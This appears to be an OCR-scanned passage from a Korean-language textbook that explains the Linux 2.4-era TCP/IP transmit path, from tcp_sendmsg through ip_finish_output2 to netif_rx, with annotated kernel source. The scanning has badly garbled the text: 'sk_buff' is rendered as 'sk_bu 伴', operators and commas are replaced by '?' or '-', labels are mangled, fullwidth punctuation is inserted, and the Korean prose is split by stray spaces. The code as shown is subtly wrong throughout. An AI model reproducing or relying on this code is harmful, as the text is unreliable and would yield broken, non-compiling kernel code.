TCPCB URG ； 



continue ； 
else { 

TCP_SKB_CB(skb)->flags | = TCPCB_FLAG_PSH ； 
tp->pushed_seq = tp ->write_seq ； 


copy = min(seglen, mss_now )； 

/* Determine how large of a buffer to allocate. */ 
tmp = MAX_TCP_HEADER + 15 + tp ->mss_cache ； 
if (copy < mss_now && !(flags & MSG_OOB)) { 
queue_it - 1 ； 

} else { 
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queue_it - 0; 

} 

skb = NULL ； 
if (tcp_memory_free(sk)) 

skb = tcp_alloc_skb(sk, tmp, sk->allocation )； 
if (skb == NULL) { 

/* If we didn’t get any memory, we need to sleep. */ 
set_bit(SOCK_ASYNC_NOSPACE, &sk->socket->flags )； 
set_bit(SOCK_NOSPACE, &sk->socket->flags )； 

— tcp_push_pending_frames(sk, tp, mss_now, 1); 
if (Itimeo) { 

err = -EAGAIN ； 
goto do_interrupted ； 

} 

if (signal_pending(current)) { 
err = sock_intr_errno(timeo )； 
goto do_interrupted ； 

} 

timeo = wait_for_tcp_memory(sk, timeo )； 

/* If SACK’S were formed or PMTU events happened, 

* we must find out about it. 

*/ 

mss_now = tcp_cur r ent_m s s (sk) ； 
continue ； 

} 

seglen -= copy ； 

/* Prepare control bits for TCP header creation engine. */ 
if (PSH_NEEDED | | after(tp ->write_seq+copy, 
tp->pushed_seq+(tp->max_window»l))) { 

TCP_SKB_CB(skb)->flags = TCPCB_FLAG_ACK | TCPCB_FLAG_PSH ； 
tp->pushed_seq = tp ->write_seq + copy ； 

} else { 

TCP_SKB_CB(skb)->flags = TCPCB_FLAG_ACK ； 

} 

TCP_SKB_CB(skb)->sacked = 0 ； 
if (flags &MSG_OOB) { 

TCP_SKB_CB(skb)->sacked | = TCPCB_URG ； 
tp->urg_mode - 1 ； 
tp->snd_up = tp ->write_seq + copy ； 

} 

/* TCP data bytes are SKB_PUT() on top, later 

* TCP+IP+DEV headers are SKB_PUSH()’d beneath. 

* Reserve header space and checksum the data. 

*/ 

skb_reserve(skb, MAX_TCP_HEADER )； 
skb->csum = csum and copy from user(from, 
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do 


do 


skb_put(skb, copy), copy, 0, &err )； 
if (err) 

goto do_fault ； 
from += copy ； 
copied += copy ； 

TCP_SKB_CB(skb)->seq = tp ->write_seq ； 
TCP_SKB_CB(skb)->end_seq = TCP_SKB_CB(skb)->seq + copy ； 
/* This advances tp->write_seq for us. */ 
tcp_send_skb(sk, skb ， queue_it ? mss_now); 


// ⑤ 

err = copied ； 

out: 

— tcp_push_pending_frames(sk ? tp, mss_now, tp->nonagle )； 
out_unlock- 

TCP_CHECK_TIMER(sk )； 
release_sock(sk) ； 
return err ； 
do_sock_err- 
if (copied) 
err = copied ； 
else 

err = sock_error(sk )； 
goto out ； 
do_shutdown: 
if (copied) 
err = copied ； 
else { 

if (!(flags&MSG_NOSIGNAL)) 
send_sig(SIGPIPE, current, 0); 
err = -EPIPE ； 

} 

goto out ； 
do_interrupted- 
if (copied) 
err = copied ； 
goto out_unlock ； 

—fault: 

— kfree_skb (skb) ； 

—fault 2: 
if (copied) 
err = copied ； 
else 

err = -EFAULT ； 


goto out ； 



⑥ 
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① 먼저 tcp_sendmsg() 함수에서 사용할 지 역 변수에 대 한 정 의부분이 다. iovec 는 
msghdr 구조체로부터 초기화가 되며 tcp_opt 는 sock 구조체의 union 으로 정의된 부분에서 
찾을수 있 다. 또한 새 롭게 할당받을 sk_bu 伴구조체 에 대 한 지 적 자와 각종 기 발들， timeout 
값들을 위한 변수가 지정된다. 

② 오유값을 초기화하고 sock 구조체로 부터 TCP 에 해당하는 규약정보에 대한 지적 
자를 얻는다. 또한 sock 에 대 한 연산을 하기 위 해서 sock 구조체 에 대 해서 금지 (lock) 를 취 
한다. sock 구조체에 대해서 timer 가 있는지를 확인하고 머리부로부터 기발값을 얻어 소 
케트의 send timeout 값을 구한다. 

③ 소케 트의 련결 이 이 루어 질 때 가지 기 다린 다. timeout 값을 설정 한다. 

④ BSD 소케트에 대해서 SOCK_ASYNC_NOSPACE 비트를 지우고 현재 TCP 토막 
(segment) 의 크기를 구한다. 그 다음 전송을 시작하는 단계이다. 먼저 보내려고 하는 자 
료의 크기 를 iovlen 값으로 설정 한다. 그리 고 iov 값을 통보머 리 부의 msg_iov 값으로 초기 화 
하고 복사계수값을 0으로 초기화한다. 

⑤ 이 부분은 while loop 를 보낼 자료가 있을 때 까지 반복적 으로 실행 하는 부분이 다. 
여 기서 skjDu 伴구조체 를 생성 한다. 즉 사용자로부터 자료를 넘 겨 받아서 sk_bu 伴를 write 
queue 에 할당한 다음 sk_bu 伴의 자료를 나타내는 부분에 사용자자료를 복사한다. 만약 
skjbu 伴를 할당할만한 공간이 체계에 없다면 프로쎄스는 기다림상태가 되며 전달하려는 파 
케트가 완성된 형태로 있지않다면 완성시켜준다. 또한 여기서는 checksum 값을 사용자의 
자료를 복사하는 과정 에 생 성 하며 csum_and_copy_from_user() , TCP 파케 트의 sequence 
번호도 생성한다. 생성된 sk_bu 伴는 tcp_send_sbk() 를 통해서 전송을 시 작한다. 

⑥ 나머지부분은 tcp_sendmsg() 함수를 종료하는것 이 다. 적절한 오유처 리와 오유코드 
를 돌려주면 된다. 여기서 보내려는 자료의 처리가 완료되였다면 
_ tcp_push_pending_frames() 함수가 호출되 여 생 성 중인 TCP 파케 트를 보관하도록 한다. 
다시 보내는 시간을 기록하게 되며 (TCP_CHECK_TIMER())，sock 구조체 에 대한 금지 
(lock) 를 해 제 하고 오유코드를 돌려주며 복귀한다. 만약 소케 트의 련결 이 끊어 지 고 이 경 
우에 신호를 받자면 현재의 프로쎄스 (current) 에 SIGPIPE 신호를 보낸 후 -EPIPE 를 오 
유코드로 넘겨준다. 

소케 트완충기 의 전달에 대 해 보기 위 하여 tcp_send_skb() 함수를 보도록 하자. 이 함 
수는 〜 / net/ipv4 / tcp_output. c 에 정 의 되 여 있 다. 
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코드 18. tcp_send_skb () 함수의 정의 

void tcp_send_skb(struct sock *sk，struct sk_bu 伴 *skb，int force_queue, unsigned 
cur_mss) 

{ 

struct tcp_opt *tp = & (sk- >tp_pinfo. af_tcp) ； 

/* Advance write_seq and place onto the write_queue. */ 
tp->write_seq = TCP_SKB_CB(skb)->end_seq ； 

_skb_queue_tail(&sk->write_queue, skb); 
tcp_charge_skb(sk, skb); 

if (!force_queue && tp->send_head == NULL && tcp_snd_test 
(tp ， skb ， cur_mss, tp ->nonagle)) { 

/* Send it out now. */ 

TCP_SKB_CB(skb)->when = tcp_time_stamp ； 
if (tcp_transmit_skb(sk ? skb_clone(skb, sk->allocation)) == 0) { 
tp->snd_nxt = TCP_SKB_CB(skb)->end_seq ； 
tcp_minshall_update(tp, cur_mss, skb )； 
if (tp->packets_out++ == 0) 

tcp_reset_xmit_timer(sk, TCP_TIME_RETRANS, tp- 
>rto )； 
return ； 


/* Queue it, remembering where we must start sending. */ 

if (tp->send_head == NULL) 
tp->send_head = skb; 


tcp_send_skb() 함수는 주함수 (main) 에 보낼 sk_bu 伴를 대 기 시 킬것 인지 아니 면 지 금 보 
낼 지 를 결정 한다 . 먼저 write sequence 를 증가시 키 고 생 성 된 sk_bu 伴를 sock 구조체 의 
write_queue 에 넣 는다 ( — skb_queue_tail()). tcp_charge_skb () 함수는 단순히 sock 구조 
체의 wmem_queued 마당과 forward_alloc 마당의 값을 갱 신하는 역 할을 한다 . 

다음 이것을 결정 하는 부분이 다 . 보내기로 했다면 보내는 시점을 기록하고 
(tcp_time_stamp=jiffies ) ， tcp_transmit_skb () 함수를 호줄한다 . 

보내 기 가 성과적 으로 되 였다면 순서 (sequence ) 를 갱 신하고 작은 (small) 파케 트에 대 
해서 다음번에 어디서부터 전송을 시작할지 기록하며 (tcp_minshall_update ()) ，보낸 파 
케 트의 계 수값을 증가시 킨다 (tp ->packets_out++). 만약 보낸 파케 트의 계 수값이 0 이 된 
다면 전송시 간 (transmission timer) 을 재 설 정 (reset) 한다 (tcp_reset_xmit_timer()). 

' 1 트를 대 기 시 키 기 위 해 서 는 sock 구조체 의 TCP 를 위 한 구조체 내 의 send_head 를 주 
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시 하여 NULL 값을 가진 다면 다음번 전송시 작에 서 sk_bu 伴를 가리키 도록 하고 끝낸 다 . 
실제적인 전송은 다시 tcp_transmit_skb() 함수를 호출하여 진행된다 . 
~/net/ipv4/tcp_out.c 를 참조하기 바란다 . 이 함수가 하는 역할은 앞에서 대기된 파 
케트 (skjbuff) 에 대한 실제적인 전송을 담당한다 . 


코드 19. tcp_transmit_skb 0 함수 

int tcp_transmit_skb(struct sock *sk，struct sk_bu 伴 *skb) 

{ 

if(skb != NULL) { 

struct tcp_opt *tp = &(sk- 〉 tp_pinfo.af_tcp); 
struct tcp_skb_cb *tcb = TCP_SKB_CB(skb )； 
int tcp_header_size = tp ->tcp_header_len ； 
struct tcphdr *th; 
int sysctl_flags; 
int err ； 

#define SYSCTL_FLAG_TSTAMPS Oxl 
#define SYSCTL_FLAG_WSCALE 0x2 
#define SYSCTL_FLAG_SACK 0x4 
sysctl_flags = 0 ； 


if (tcb->flags & TCPCB_FLAG_SYN) { 

tcp_header_size = sizeof(struct tcphdr) + TCPOLEN_MSS ； 

if(sysctl_tcp_timestamps) { 

tcp_header_size += TCPOLEN_TSTAMP_ALIGNED ； 
sysctl_flags | = SYSCTL_FLAG_TSTAMPS ； 

} 

if(sysctl_tcp_window_scaling) { 

tcp_header_size += TCPOLEN_WSCALE_ALIGNED ； 
sysctl.flags | = SYSCTL_FLAG_WSCALE ； 

} 

if(sysctl_tcp_sack) { 

sysctl_flags | = SYSCTL_FLAG_SACK ； 
if(!(sysctl_flags & SYSCTL_FLAG_TSTAMPS)) 

tcp_header_size += TCPOLEN_SACKPERM_ALIGNED ； 

} 

} else if (tp - 〉 e 伴 - sacks) { 

/* A SACK is 2 pad bytes, a 2 byte header, p lus 

* 2 32-bit sequence numbers for each SACK block. 

tcp_header_size += (TCPOLEN_SACK_BASE_ALIGNED + 

(tp - 〉 e 伴 - sacks * TCPOLEN_SACK_PERBLOCK ))； 

} 

th = (struct tcphdr *) skb push(skb, tcp header size) ； 
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skb- 〉 h.th = th ； 
skb_set_owner_w(skb ? sk )； 

// ② 

/* Build TCP header and checksum it. */ 
th->source = sk->sport ； 
th->dest = sk- 〉 dport; 
th-〉seq = htonl(tcb- 〉 seq); 
th->ack_seq = htonl(tp- 〉 rcv_nxt); 

*(((_ul6 *)th) + 6) = htons(((tcp_header_size » 2) « 12) | tcb- 〉 flags); 
if (tcb-〉flags & TCPCB_FLAG_SYN) { 
th->window = htons (tp - >r c v_wnd) ； 

} else { 

th->window = htons(tcp_select_window(sk ))； 

} 

th->check = 0 ； 
th->urg_ptr = 0 ； 
if (tp->urg_mode && 

between(tp - 〉 snd_up ， tcb- 〉 seq+l, tcb->seq+0xFFFF)) { 
th->urg_ptr = htons(tp->snd_up-tcb->seq )； 
th->urg = 1 ； 

} 

if (tcb-〉flags & TCPCB_FLAG_SYN) { 
tcp_syn_build_options((_u32 *)(th + 1), 
tcp_advertise_mss(sk), 

(sysctl_flags & SYSCTL_FLAG_TSTAMPS), 

(sysctl_flags & SYSCTL_FLAG_SACK), 

(sysctl.flags & SYSCTL_FLAG_WSCALE), 
tp ->rcv_wscale, tcb->when, tp ->ts_recent )； 

} else { 

tcp_build_and_update_options(( — u32 *)(th + 1) ， tp, tcb- 〉 when); 
TCP_ECN_send(sk, tp, skb ， tcp_header_size )； 

} 

tp->af_specific ->send_check(sk, th, skb->len, skb); 
if (tcb-〉flags & TCPCB_FLAG_ACK) 
tcp_event_ack_sent(sk) ； 
if (skb->len != tcp_header_size) 
tcp_event_data_sent(tp, skb); 

TCP_INC_STATS(TcpOutSegs )； 

// ③ 
err = tp->af_specific ->queue_xmit(skb )； 
if (err <= 0) 
return err ； 
tcp_enter_cwr(tp) ； 

return err = NET_XMIT_CN ? 0 : err ； 

之 
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return -ENOBUFS ； 

#undef SYSCTL_FLAG_TSTAMPS 
#undef SYSCTL_FLAG_WSCALE 
#undef SYSCTL_FLAG_SACK 

} 

// ④ 


① tcp_transmit_skb() 함수에서 사용할 지 역 변수를 적 절하게 설정 하는 부분이 다 . 

#define 으로 정의된 상수는 각각 Timestamp 와 Window Scale, Select 

Acknowledgement 를 정 의 하는것 이 다 . 

② sock 구조체 에 들어가 있는 TCP control block 의 기 발설 정 에 따라서 TCP 의 머 리 
부 (header) 크기 를 구하고 이 것을 리 용하여 sk_buff 에 TCP 머 리부가 차지 할 공간을 마련 
해 둔다 (skb_push()). 

다음 sk_buff 의 TCP 를 위한 머 리 부정 보를 나타내 는 th 마당을 초기 화한다 . 
skb_set_owner_w() 함수는 sk_buff 의 현재 사용유무와 누가 사용하는지 (sock 구조체 )， 
destructor 함수 및 INET sock 의 wmem_alloc 마당을 갱 신 한다 . 

③ 이 부분은 TCP 머리부와 TCP 검사합을 생성하는 부분이다 . 원천 (source) 과 목적 
지 (destination) 의 포구번 호 및 TCP 순서 번 호와 ACK(acknowledge) 순서 번 호를 설 정 한다 . 
또한 TCP 의 window 크기 등의 정 보들을 설정한다 . 또한 TCP 에 설정된 옵션들에 대 한 머 
리부정보도 이곳에서 설정된다 . 마지막으로 자료인지 ACK 파케트인지를 확인해서 관련된 
timer 들을 설정하고 TCP 의 통계정보를 갱신한다 . 

④ 이 부분은 아래의 전송함수를 호출하는 부분이다 . 이것이 바로 tp->af_specific 
- 〉 queue_xmit() 함수이 다 . 먼 저 sock 구조체 의 TCP 를 위 한 tp_info 마당의 af_specific 마 
당값을 보자 . 이 것 은 tcp_func 구조체 로 정 의 되 여 있 으며 tcp_func 구조체 는 아래 와 같다 . 
( 〜 /include/net/tcp.h 를 참고하라 .) 

tcp_func 구조체 는 아래 증에 서 제 공해 주어 야 할 함수들에 대 한 지 적 자들과 변수로 구 
성된다 . 매개의 함수들은 TCP 아래층에서 정의하고있으므로 IP 부분을 주시하여야 한다 . 여 
기서 필요한 함수는 queue_xmit() 이 다 . tcp_func 의 IPv4 에 대 한 정의는 아래 와 같다 . 

이 함수는 ~/net/ipv4/tcp_ipv4.c 에 정 의 되 여있 다 . 


코드 20. TCP specific function 의 IPv4 에 대한 정의 
struct tcp_func ipv4_specific = { 
ip_queue_xmit, 
tcp_v4_send_check, 
tcp_v4_rebuild_header, 
tcp_v4_conn_request, 
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tcp_v4_syn_recv_sock ， 
tcp_v4_hash_connecting, 
tcp_v4_remember_stamp, 
sizeof(struct iphdr), 
ip_setsockopt, 
ip_getsockopt, 
v4_addr 2 sockaddr, 
sizeof(struct sockaddr_in) 


다음으로 중요한 함수는 ip_queue_xmit() 이 다 . 이 함수는 IP 층에 서 제 공하고있 다 . IP 
층은 현재 IPv4 와 IPv6 로 나누어져 있 다 . 

현재 IPv6 는 아직 널리 사용되지는 않으며 망의 련동검사가 진행중이다 . 

— IP 층 

IP 층의 역할은 웃층에서 만들어진 자료를 보내는것과 아래층에서 받은 자료를 웃층 
으로 올려주는 역 할을 한다 . 이 때 보내 기 위한 자료의 재 조립 과정 이 일 어 나게 되 며 받은 자 
료의 내 용에 대 해 서 는 관심 하지 않는다 . 

오직 자신을 위한 머리부 (header ) 를 정확히 받았는지를 확인할수 있는 순환주기검사 
(Cyclic Redundancy Check ： CRC) 기 능을 수행 하게 된다 . 

ip_queue_xmit() 함수를 고찰해 보자 . (~/net/ipv4/ip_output. c 를 참조 ) 이 함수가 하 
는 역 할은 넘 겨 받은 sk_bu 伴를 장치층에 맞게 수정 하여 보내 는 역 할을 수행 한다 . 따라서 필 
요하다면 넘겨 받은 자료를 합치거 나 나누며 자료의 내용에는 관심을 두지 않는다 . 


코드 21. ip_queue_xmit 0 함수 
int ip_queue_xmit(struct sk_bu 伴 *skb){ 
struct sock *sk = skb ->sk ； 

struct ip_options *opt = sk->protinfo.af_ine t.opt ； 
struct rtable *rt; 
struct iphdr *iph; 

// ① 

/* Make sure we can route this packet. */ 
rt = (struct rtable *) — sk_dst_check(sk, 0); 


if (rt == NULL) { 
u32 daddr ； 


/* Use correct destination address if we have options. */ 
daddr = sk->daddr ； 


if(opt && opt->srr) 


/ 




daddr = opt->faddr ； 
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if (ip_route_output(&rt, daddr ， sk- 〉 saddr, 

RT_TOS(sk->protinfo.af_inet.tos) | RTO_CONN | sk->localroute, 
sk->bound_dev_if)) 
goto no_route ； 

— sk_dst_set(sk, &rt- 〉 u.dst); 

} 

skb-〉dst = dst_clone(&rt->u. dst) ； 

if (opt && opt->is_strictroute && rt->rt_dst != rt->rt_gateway) 
goto no_route ； 

// ② 

/* OK, we know where to send it, allocate and build IP header. */ 

iph = (struct iphdr *) skb_push(skb, sizeof(struct iphdr) + (opt ? opt->optlen : 0)); 

*(( — ul6 *)iph) = htons((4 « 12) | (5 « 8) | (sk->protinfo.af_inet.tos & Ox 伴 )); 

iph->tot_len = htons(skb->len )； 

iph->frag_off = 0 ； 

iph-〉ttl = sk- 〉 protinfo.af_inet.ttl; 

iph->protocol = sk- 〉 protocol; 

iph-〉saddr = rt- 〉 rt_src; 

iph->daddr = rt->rt_dst ； 

skb- 〉 nh.iph = iph ； 

/* Transport layer set skb ->h.foo itself. */ 

if(opt && opt->optlen) { 

iph->ihl += opt-〉optlen » 2 ； 
ip_options_build(skb ? opt, sk->daddr, rt, 0); 

} 

return NF_HOOK(PF_INET ? NF_IP_LOCAL_OUT, skb, NULL, rt- 〉 u.dst.dev, 
ip_queue_xmit2) ； 
no_route- 

IP_INC_STATS(IpOutNoRoutes )； 

kfree_skb(skb )； 

return -EHOSTUNREACH ； 

} 

// . (3) 


① ip_queue_xmit() 함수가 넘 겨 받는것 은 sk_bu 伴구조체 뿐이 다. 이것은 앞에서 이 미 
TCP 층에서 생성된 sk_bu 伴이 다. 여 기서는 sk_bu 伴의 sock 구조체 를 가리 키는 마당을 찾 
아서 필요한 정보들을 얻을수 있다. 즉 IP 층에서 필요한 옵션이 될것이다. IP 층에서는 또 
한 어디로 보내는가에 대한 정보도 필요하다. IP 주소까지는 이미 알고있으므로 IP 주소를 
가지 고 목적 지 에 해 당하는 물리주소를 찾아야 한다. 이 때 필 요한것 이 바로 경 로조종표 
(routing table) 이 다. 이 표를 rtable 구조체 로 정 의 한다. 


1 
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② 경로조종표에 대한 값을 구한다. 만일 경로조종표에 목적지에 해당하는 값이 있다 
면 문제로 되지 않지만 그것이 없다면 경로조종정보를 얻어야 한다 (__sk_dst_check()). 물 
론 경로조종표의 정보도 다시 갱신하여야 한다. 경로조종표에 정보가 없다면 (rt==NULL) 
목적 지 의 주소 (daddr) 를 가지 고 ARP 를 리 용하여 야 한다. (ip_route_output ()). 

③ 다음 IP 머 리부를 설정하여 야 한다. 물론 이것은 sk_bu 伴의 앞부분에 들어가야 한 
다 (sk_push()). 또한 sk_bu 伴의 IP 머리부를 가리키는 부분도 sk_bu 伴의 IP 머리부가 되도 
륵 한다 (sk_ 〉 nh.iph). 마지막으로 자료를 망장치구동기로 전송하는 일이 남았다. 보내 려 
고 하는 자료에 대 한 모든 정 보는 sk_bu 伴에 이 미 들어 가 있는 상태 다. sk_bu 伴는 net_device 
구조체 를 가진다. 이 것은 sock 구조체 가 묶여 진 (bound 된)망장치 의 index 로부터 알수 있 
다. 다음 망장치로 sk_bu 伴를 보내면 된다 (NF_HOOK0). 

만약 경로 (route) 가 없다면 IP 의 통계정보에 경로가 없는 파케트에 대한 연산이 있다 
는것 을 나타내 고 (IP_INC_STATS(IpOutNoRoutes) ， sk_bu 伴완충기 를 해 제 (free_skb 0 ) 
하고 복귀한다. 

NF_HOOK() 는 마크로이며 〜 /Linux/netfilter.h 에 아래와 같이 정의되여있다. 


코드 22. NF_HOOK() 마크로의 정의 
■ef CONFIG_NETFILTER 

# define NF_HOOK(pf, hook, skb, indev, out dev, okfn) \ 
(list_empty(&nf_hooks[(pf)] [(hook)]) \ 

? (okfn) (skb) \ 

: nf_hook_slow ((pf), (hook ) ， (skb ) ， (indev), (outdev ) ， (okfn))) 
#else 

#define NF_HOOK(pf, hook, skb, indev, outdev, okfn) (okfn) (skb) 
#endif 


지금 우리가 서술하고 있는것은 극히 단순화된 망의 일반적 인 흐름에 대한것이므로 


netfilter 는 제외하기로 한다. 따라서 현재는 CONFIG_NETFILTER 가 정의되지 않았기때 
문에 단순히 제 일 마지 막에 있는 (okfn) (skb) 가 호출된 다. ip_queue_xmit() 함수에 서 는 
ip_queue_xmit2 () 함수가 된 다 . 

ip_queue_xmit2() 함수의 정의는 아래와 같다. ~/net/ipv4/ip_output.c 를 계속 참조 


하자. 

鍾 
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코드 23. ip_queue_xmit2() 함수 

static inline int ip_queue_xmit2 (struct sk_bu 伴 * skb) 

{ 

struct sock *sk = skb ->sk ； 

struct rtable *rt = (struct rtable *)skb- 〉 dst; 

struct net_device *dev; 

struct iphdr ^iph = skb- 〉 nh.iph; 

dev = rt- 〉 u.dst.dev; 

// ① 

/* This can happen when the transport layer has segments queued 

* with a cached route, and by the time we get here things are 

* re -routed to a device with a different MTU than the original 

* device. Sick, but we must cover it. 

if (skb_headroom(skb) < dev->hard_header_len && dev->hard_header) { 
struct sk_bu 伴 *skb2 ； 

skb2 = skb_realloc_headroom(skb, (dev->hard_header_len + 15) & 〜 15); 
kfree_skb(skb )； 
if (skb2 == NULL) 
return -ENOMEM ； 
if (sk) 

skb_set_owner_w(skb2, sk )； 
skb = skb2 ； 
iph = skb- 〉 nh.iph; 

} 

if (skb->len > rt->u.dst.pmtu) 
goto fragment ； 

if (ip_dont_fragment(sk, &rt->u.dst)) 

iph->frag_off | = — constant_htons(IP_DF )； 
ip_select_ident(iph ? &rt->u.dst )； 

/* Add an IP checksum. */ 
ip_send_check(iph) ； 
skb->priority = sk- 〉 priority; 
return skb->dst->output(skb )； 

// ② 

fragment- 

if (ip_dont_fragment(sk ? &rt->u.dst)) { 

/* Reject packet ONLY if TCP might fragment 
it itself, if were careful enough. 

*/ 

iph->frag_off | = — constant_htons(IP_DF )； 

NETDEBUG(printk(KERN_DEBUG ’’sending pkt_too_big to self\n”)); 
icmp_send(skb, ICMP_DEST_UNREACH ? ICMP_FRAG_NEEDED ? 

ht onl (r t ■ >u. ds t. p mtu)) ； 
kfree skb(skb )； 
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return -EMSGSIZE ； 

} 

ip_select_ident(iph ? &rt- 〉 u.dst); 

return ip_fragment(skb, skb->dst->output )； 

} 

// ③ 


① 먼저 넘 겨 받은 sk_bu 伴로 부터 필요한 정 보를 가져 온다 . 여 기서는 sock 구조체 와 
net_device 구조체 IP 머 리 부정보 및 경 로조종표가 필 요하다 . 

② 만일 skjbu 伴가 가지 는 여 분의 머 리 부를 위한 공간이 아래 층의 장치 층이 리용하려 
고 하는 공간보다 작을 때 에는 새 롭게 머 리부를 위한 공간을 할당한다 
(skb_realloc_headroom()). 새 롭게 할당되 였 다면 필 요한 초기 화를 해 주고 보내 려 고 하는 
경로를 고찰하여 sk_bu 伴가 가전 자료의 길이보다 더 작은 파케트만을 한번에 보낼수 있 
다면 파케트를 쪼개는것이 필요하다 . 이것을 토막화 (segmentation) 라고 하며 반대로 하 
는것을 조립 (assembly)/ 재 조립 (reassembley) 이 라고 한다 . 

최 대전송단위 (Maximum Transfer Unit ： MTU) 작다면 토막화과정 으로 가고 그렇 
지 않다면 IP 검 사합을 더한 후 sock 구조체 의 우선도를 sk_bu 伴의 우선순위 로 설정한다 . 

다음 장치 층의 output 를 호출한다 . 호출되 는것 은 skb- 〉 dst- 〉 output(skb) 이 다 . 

③ 만일 토막화할 경 우라면 fragment 이 하의 부분을 실 행한다 . sk_bu 伴의 머 리 부정보 
를 주목하여 (IP header) 보내 려 고 하는 파케 트가 더 이 상 조각화 (fragmentation) 를 할 필 
요가 없 다면 ICMP (Internet Control Message Protocl) 통보를 보내 고 소케 트완충기 를 해 
방한다 . 그렇 지 않다면 ip_fragment() 함수에 sk_bu 伴와 skb- 〉 dst- 〉 output() 함수를 파라메 
터 로서 넘 겨주고 호출한다 . 

다음 skb- 〉 dst_ 〉 output() 함수를 보도록 하자 . IP 층에서 마지 막으로 자료를 보내 기 위 
해서 호출되는 함수 이다 . 앞에 서 ip_queue_xmit () 함수에 서 호출된 ip_route_output () 가 
skb->dst~>output () 에 대 한 함수 지 적 자를 련결 한다 . 먼 저 ip_route_output () 는 
〜 /include/net/route.h 에 inline 함수로 정의되여있다 . 이 함수는 경로조종표에 대한 key 
값을 생성 한 후 다시 ip_roiite_output_key() 함수를 호출한다 . ip_route_output_key() 함 
수는 ~/net/ipv4/route.c 에 정의되 여 있으며 이 함수는 경 로조종표에 대 한 key 값으로 경 
로조종표을 검 사해 서 해 당한 목적 지 에 대 한 경 로조종정 보를 가져 온다 . 옳바른 경 로조종정 
보를 얻 었 다면 다시 ip_route_output_slow() 함수를 경 로조종표와 key 값을 넘 겨 주면서 호 
줄한다 . 

ip_route_output_slow () 함수는 경 로 (route) 찾기 의 주요 (main) 함수로서 여 기 서 
skb- 〉 dst_ 〉 output() 함수의 지적자 값이 ip_output() 함수로 결정된다 . 

ip_output() 함수는 아래와 같다 . ~/net/ipv4/ip_output.c 를 참조하였다 . 
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코드 24. ip_output () 함수 

int ip_output (struct sk_bu 伴 *skb) 

{ ᅭ 

#ifdef CONFIG_IP_ROUTE_NAT 

struct rtable *rt = (struct rtable*) skb->dst ； 

#endif 

IP_INC_STATS (IpOutRequests) ； 

■ef CONFIG_IP_ROUTE_NAT 
if (rt->rt_flags&RTCF_NAT) 
ip_do_nat(skb) ； 

#endif 

return ip_finish_output(skb) ； 


ip_output () 함수는 CONFIG_IP_ROUTE_NAT 가 설정되지 않았다면 IP 층의 output 
요구회수를 나타내는 계수값을 증가시 킨 후 ip_finish_output () 함수를 호출하는 역 할을 한 
다 . 그러면 ip_finish_output() 함수를 보도록 하자 . ~/net/ip_output. c 를 참조하였다 . 


코드 25.ip_finish_output 0 함수 

— inline 一 int ip_finish_output (struct sk_buff *skb) 


struct net_device *dev = skb - 〉 dst_ 〉 dev; 
skb->dev = dev ； 

skb->protocol = — constant_htons(ETH_P_IP) ； 

return NF_HOOK(PF_INET, NF_IP_POST_ROUTING, skb, NULL, dev, 
ip_finish_output2) ； 


이것은 inline 으로 netfilter 를 위해서 정의된 함수이다 . 다음 ip_finish_output2 () 함 
수가 호출된다 . 

계 속해 서 이 것 을 해 석 하면 ip_finish_output2 () 함수는 아래 와 같다 . 


코드 26. ip_output_finish2 () 함수 

static inline int ip_finish_output2 (struct sk_bu 伴 *skb) 

{ 

struct dst_entry *dst = skb ->dst ； 
struct hh_cache *hh = dst_ 〉 hh; 

■ef CONFIG_NETFILTER_DEBUG 
nf_debug_ip_finish_output2 (skb) ； 
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#endif /*CONFIG_NETFILTER_DEBUG*/ 
if (hh) { 

read_lock_bh (&hh~>hh_lock) ； 
memcpy (skb->data - 16 ， hh_ 〉 hh_data ， 16); 
read_unlock_bh (&hh->hh_lock) ； 
skb_push(skb, hh->hh_len) ； 

4 NAT (Network Address Translation), IP 주소의 공유를 설 정 하는것 이 다 . 
return hh~>hh_output(skb) ； 

} else if (dst~>neighbour) 

return dst->neighbour~>output (skb) ； 
printk(KERN_DEBUG n khm\n”); 
kfree_skb(skb) ； 
return -EINVAL; 


ip_output_finish2 () 함수는 실 제 적 으로 이 써 네 트주소 (ethernet address) 를 sk_bu 伴구 
조체 에 복사해 넣 고 hh- 〉 hh_output() 함수를 호출하거 나 dst- 〉 neighbour- 〉 output() 함수를 
호출한다 . 여 기 서 hh_cache 구조체 는 하드웨 어 머 리 부고속완충기 (hardware header cache) 
를 나타내는것으로 이 값에 따라서 hh- 〉 hh_output() 함수가 호출될지 아니면 
dst-〉neighbour 마당을 고찰하여 dst- 〉 neighbour- 〉 output() 함수를 호출할지 결정 한다 . 따 
라서 hh->hh_output () 함수나 dst->neighbour->output () 함수 결 국 neighbour 구조체 의 
ops (operation) 마당의 dev_queue_xmit() 함수를 호출하게 된 다 . 

dev_queue_xmit () 함수는 시 net/core/dev. c 에 정 의 되 여 있 으며 망장치 구동기 에 서 
export 한 dev->hard_start_xmit () 함수를 호출한다 . 여 기 서 부터 장치 구동기 에 대 한 직 접 
적 인 호줄이 시 작된 다 . 넘 겨 주는것 은 망장치 를 지 적 하는 net_device 구조체 의 지 적 자와 웃 
층에서 넘 겨 받은 s k_bu 伴구조체 에 대 한 지적 자이 다 . 

2) 파케트수신과정 

여 기서 는 장치 층으로부터 응용프로그람층까지 자료를 수신하는 립장에서 전반적 인 자 
료흐름과정 에 대 해 고찰하자 

一 장치구동기층 

먼저 망장치구동기 가 파케 트를 받게 되면 새 치기 가 발생한다 . 례를 들어서 Intel 
ethernet express pro 100 의 경우 코드 27 과 같은 함수가 호출된다 . 

이 함수는 〜 /drivers/net/eeprolOO.c 를 참고하였다 . 
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코드 27. RX interrupt 처 리 

static void speedo_interrupt (int irq, void *dev_instance, struct pt_regs *regs) 

{ 

speedo_rx(dev); 


static int speedo_rx(struct net_device *dev) 

{ 

netif_rx(skb) ； 


즉 speedo_interrupt () 함수가 파케트의 도착시에 호출되며 장치의 등록기상태를 확인 
해서 이것이 RX (receive) 인 경우에 speedo_rx() 함수를 호출한다 . 도착한 파케트를 sk_bu 伴 
의 형래로 만든 다음 다시 speedo_i*x () 함수는 netif_rx () 함수를 호출하여 망의 파케트가 도 
착했음을 웃층에 알려준다 . 

netif_i*x() 함수를 보도록 하자 . 여 기 까지 진행 했 다면 이 미 sk_buff 구조체 는 매 층에 필 
요한 정보들을 다 가지고있다 . 


코드 28. netif_rx () 함수 

int netif_rx(struct sk_bu 伴 *skb) 

{ 

int this_cpu = smp_processor_id ()； 
struct softnet_data *queue ； 
unsigned long flags; 
if (skb->stamp.tv_sec == 0) 

get_fast_time(&skb ->stamp )； 
queue = &softnet_data[this_cpu] ； 
local_irq_save(flags )； 
